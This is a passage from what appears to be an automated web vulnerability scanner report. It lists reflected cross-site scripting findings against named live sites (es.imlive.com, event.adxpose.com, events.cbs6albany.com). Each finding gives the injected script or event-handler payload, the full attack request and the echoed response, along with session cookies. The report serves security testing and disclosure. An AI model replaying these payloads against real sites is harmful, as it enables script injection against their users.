Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
Set-Cookie: spvdr=vd=903513d8-3e33-4831-96f3-029102fe04ec&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 19524
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;">
...[SNIP]...

4.398. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
Set-Cookie: spvdr=vd=ba938df6-402f-42af-9e74-39a2f773e158&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:09 GMT
Connection: close
Content-Length: 19123
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/?86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&iy=dallas&id=44&iu=1&vd=ba938df6-402f-42af-9e74-39a2f773e158';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.399. http://es.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:24 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.400. http://es.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:29 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.401. http://es.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:17 GMT
Connection: close
Content-Length: 8313
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=es.imlive.com&ul=/webcam-login/25492'onerror='alert(1)'4929c58198/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://es.imlive.com:80/webcam-login/25492'onerror='alert(1)'4929c58198/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.402. http://es.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:17 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.403. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ddf3f<script>alert(1)</script>ed09fa2b95 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845ddf3f<script>alert(1)</script>ed09fa2b95&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BAA0A4E3D8DA072903C9105A9AD18668; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 146
Date: Fri, 28 Jan 2011 16:42:08 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845ddf3f<script>alert(1)</script>ed09fa2b95");

4.404. http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3fe"><script>alert(1)</script>4fe2eb96fc6 was submitted in the 376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1cd3fe"><script>alert(1)</script>4fe2eb96fc6 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:01:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 94
ETag: "31918f17271fc00ea416f0b83b383361"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: welcome=nVWDjTFsTZ5trFFm8r8ryg.100055494; path=/; expires=Sun, 29-Jan-2012 02:01:52 GMT
Set-Cookie: zvents_tracker_sid=nVWDjTFsTZ5trFFm8r8ryg.100055494; path=/; expires=Sun, 29-Jan-2012 02:01:52 GMT
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMTViYjI3MjFmZTU4ZGQ3NTgyN2MzMWFkZjlkY2U3MTYiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--70355ead04c69491676a945c6ab82f0f18eab221; path=/; expires=Fri, 29-Apr-2011 02:01:52 GMT; HttpOnly
Content-Length: 49435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1cd3fe"><script>alert(1)</script>4fe2eb96fc6" />
...[SNIP]...

4.405. http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The value of the 376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 388f4"><script>alert(1)</script>42460964186 was submitted in the 376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1388f4"><script>alert(1)</script>42460964186 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; Zvents=fnr9vfxsab; SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; __qca=P0-387650238-1296236241942

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 02:02:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 45
ETag: "7d101c69a516b70523b811d0f5f37e06"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; path=/; expires=Fri, 29-Apr-2011 02:02:50 GMT; HttpOnly
Content-Length: 49491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1388f4"><script>alert(1)</script>42460964186" />
...[SNIP]...

4.406. http://events.cbs6albany.com/ [376e5%22%3e%3cscript%3ealert(1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The value of the 376e5%22%3e%3cscript%3ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58b9"><script>alert(1)</script>83d0d4a44c4 was submitted in the 376e5%22%3e%3cscript%3ealert(1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3e%3cscript%3ealert(1d58b9"><script>alert(1)</script>83d0d4a44c4 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:30:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 43
ETag: "25454dda258b53938f11c88f035c760f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:30:32 GMT; HttpOnly
Content-Length: 49693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?376e5%22%3e%3cscript%3ealert(1d58b9"><script>alert(1)</script>83d0d4a44c4" />
...[SNIP]...

4.407. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd942"><script>alert(1)</script>22ceebdf215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1&bd942"><script>alert(1)</script>22ceebdf215=1 HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
